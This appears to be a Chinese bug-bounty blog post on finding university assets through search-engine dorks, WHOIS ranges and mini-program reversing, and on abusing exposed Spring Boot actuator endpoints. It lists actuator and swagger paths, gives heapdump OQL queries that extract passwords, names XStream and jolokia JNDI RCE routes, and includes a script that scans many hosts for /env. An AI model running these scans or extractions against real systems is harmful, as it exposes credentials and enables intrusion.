前言
每一次成功的滲透,都有一個非常完備的信息搜集。
大師傅講的好呀:信息搜集的廣度決定了攻擊的廣度,知識面的廣度決定了攻擊的深度。
在goby亂掃的開始,我也是菜弟弟一樣,看到什么都沒感覺,直到有個師傅提醒了我:這不是Sprint boot框架么,洞這么多還拿不下?
這也就導致了我后來的一洞百分。
(只會偷大師傅思路的屑弟弟)
一 信息搜集
信息搜集可以從多個領域來看
公司,子公司,域名,子域名,IPV4,IPV6,小程序,APP,PC軟件等等等等 我主要在EDUsrc干活,各大高校也是算在公司內的
比如某某大學,我們查到大學后還能干什么呢?
那么我們就可以重點關注備案網站,APP,小程序,微信公眾號,甚至於微博,
微博地點,將他們轉換為我們的可用資源。
企查查是付費的,我一般使用的是小藍本
這樣,域名,小程序,微信公眾號,一網打盡,是不是感覺挺輕松的?
有了域名之后,我們該如何是好了呢?
那當然是爆破二級域名,三級域名,我們可以選擇OneforALL,驗證子域名,然后使用masscan驗證端口,但是我一般使用的是子域名收割機(當然layer也可以)
這里因為工具不是我本人的,不方便提供。
他會將IPV4,IPV6,部分域名都提供,那么我們先從IP入手
IP我們可以做什么呢?
我們已經知道某個ip屬於教育網段,那么怎么具體知道其他ip呢?
我們可以定位WHOIS
whois中包含了用戶,郵箱,以及購買的網段!
沒錯,購買的網段!
有了這個,媽媽再也不用擔心我打偏了(狗頭)
有了網段,我們大可以開展下一步
1.1 主動信息搜集
在主動信息搜集的時候,我們可以使用一些強大的資產測繪工具,goby(目前在用),資產測繪還是挺不錯的,他會有一些web服務,可以供你撿漏,不要擔心沒有banner,有時候goby也不認識呢!
1.2 被動信息搜集
被動信息搜集就是使用一些在線的大量爬取的網站。
因為這些語法網上蠻多的,(個別)就不拿具體網站做展示了。
Google hack語法
百度語法
Fofa語法
shodan語法
鍾馗之眼
微步在線
我們先來看Google,Google語法大家可能都比較熟悉
site:"edu.cn"
最基本的edu的網站后綴。
inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms
查找文本內容:
site:域名 intext:管理|后台|登陸|用戶名|密碼|驗證碼|系統|帳號|admin|login|sys|managetem|password|username
查找可注入點:site:域名 inurl:aspx|jsp|php|asp
查找上傳漏洞:site:域名 inurl:file|load|editor|Files
找eweb編輯器:
site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit
存在的數據庫:site:域名 filetype:mdb|asp|#
查看腳本類型:site:域名 filetype:asp/aspx/php/jsp
迂回策略入侵:inurl:cms/data/templates/images/index/
多種組合往往能散發不一樣的魅力
百度語法
同google語法沒有太大差距
Fofa語法
在fofa中如何定位一個學校呢?
有兩個方法
一個是org,一個是icon_hash
有了這些還怕找不到資產?
因為一個學校的iconhash 往往都是幾個固定的,所以我們搜索iconhash的時候,也會有不一樣的效果。
如下為icon腳本(python2)
import mmh3
import requests
response = requests.get('url/favicon.ico',verify=False)
favicon = response.content.encode('base64')
hash = mmh3.hash(favicon)
print hash
那么問題來了,org怎么找呢,別急
不同的搜索引擎org有略微不同
fofa的org搜索
org="China Education and Research Network Center"
當然全都是org的,(沖,亂殺)
shodan語法
shodan和fofa大致相同,也是存在org和icon的,
只不過org有點不同
org:"China Education and Research Network"
org:"China Education and Research Network Center"
shodan這邊有時候還會更加細分,某個大學也會有自己的組織,(隨機應變嘍)
鍾馗之眼
鍾馗之眼的好處在於,他會把所有組件的漏洞都羅列出來,便於檢測
organization:"China Education and Research Network Center"
微步在線
正向查找都說了,那反向呢?
微步的反向ip查找域名十分好用
某高校一個ip甚至會綁定幾百個域名
那是不是找到最新的域名發現時間,開始了呢!
小程序
好了好了,咱們話題要回來噢
姥爺們又說了,小程序有個p,欸可不能這樣
還記得我們剛剛說到的信息搜集嗎?
剛剛企查查找到的小程序,里面也有相關服務器的接口才能通訊呀!
我們打開我們的crackminapp
將微信小程序包導進去,逆向源代碼,(如果有需要,會專門出一個如何尋找/抓包小程序)
在app.js中一般存在有主url
我們需要去每個js頁面中,尋找到合適的參數構造,接口,發包查看具體情況
欸?是不是就找到了呢?
app抓包
app抓包現在花樣百出,我一般使用charles
當然只能是安卓7以下,高版本的話需要自己去學習嘍~百度一下
(如果有想用的,也是看看情況吧)
1.3 信息搜集小匯總
信息搜集的廣度決定了攻擊的廣度,知識面的廣度決定了攻擊的深度。
如上這些,完全可以混合起來,達到更加完美的效果(菜弟弟第一個文章,大佬們勿噴)。
所以,學習不要停下來啊,(希望之花~~~)
二 漏洞尋覓
話續上集
有的老爺們問了:有了資產不會打呀,廢物,騙子,RNM退錢!(補個表情包)
欸,別急嘛,
0day 能挖到么?挖不到,
1day 拿來piao,寒摻么?不寒摻!
這里需要時刻關注各大公眾號的推文啦,星球啦,一般也能刷個十來分。
(這里感謝PeQi師傅的文庫)膜拜膜拜~~
收
Spring boot 是越來越廣泛使用的java web框架,不僅僅是高校,企業也用的越來越多
那么如果有Spring boot的漏洞豈不是亂殺?
好,如你所願
https://github.com/LandGrey/SpringBootVulExploit
這個就是一洞百分的Spring boot(掏空了,掏空了55555)
首先我們要知道
Spring boot 2和Spring Boot 1是不同的
payload也是不同的
2.1 路由地址
swagger相關路由前兩天有表哥也發了fuzz,如果存在,那便可以沖了!
/v2/api-docs
/swagger-ui.html
/swagger
/api-docs
/api.html
/swagger-ui
/swagger/codes
/api/index.html
/api/v2/api-docs
/v2/swagger.json
/swagger-ui/html
/distv2/index.html
/swagger/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/static/swagger.json
/user/swagger-ui.html
/swagger-ui/index.html
/swagger-dubbo/api-docs
/template/swagger-ui.html
/swagger/static/index.html
/dubbo-provider/distv2/index.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
2.2 敏感信息
最重要的當然是env和/actuator/env了
他們一個隸屬於springboot1 一個屬於springboot2
/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
2.3 heapdump
噢?這里又會有什么呢?
這里會有所有的堆棧信息喲
那些在env中加星號的都會出來喲
我們訪問
/heapdump
/actuator/heapdump
然后使用Memory Analyzer 工具oql查找即可
感謝landGrey師傅(站在巨人的肩膀上),非常感謝
https://landgrey.me/blog/16/
OQL語句如下
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
或
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
噢?,這都可以?
那當然,redis,數據庫,拿下~
又有老爺問了:spring boot不是rce嘛,騙子!
別着急
那么,最常見的RCE是什么呢?
eureka xstream deserialization RCE
需要先修改defaultZone 然后刷新配置
注意!修改有風險,請提前聯系相關人員!
注意!修改有風險,請提前聯系相關人員!
注意!修改有風險,請提前聯系相關人員!
我們怎么辦呢,沒辦法呀啊sir,只有dnslog來的實在
jolokia logback JNDI RCE
jolokia !jolokia!jolokia! yyds
詳情可在那個師傅 github 里面學習喲~(詳情不做展開)
2.4 批量生產
呼呼呼~終於來到這里啦,
學習了這么多,怎么找嘛,還是騙人~(語氣逐漸低沉)
來了來了
如果我們在fofa中找spring boot 的相關網站,我們可以使用icon,app,還能使用關鍵字呀~
如何定位spring boot的呢?
報錯404呀
我們通過學習的信息搜集,一通合並
ohhhh 600個
其他icon等之類的方法不做演示(避免危害太大5555555555)
這個是批量腳本,把url放到list里面就行啦
import requests
list = ['','']
for i in list:
try:
url = "http://" +i + "/actuator/env"
print(url)
res = requests.get(url=url,allow_redirects=False,timeout=5)
print(res.text)
url = "http://" +i + "/env"
print(url)
res = requests.get(url=url,allow_redirects=False,timeout=5)
print(res.text)
except:
pass
print("overeeeeeeeeeee")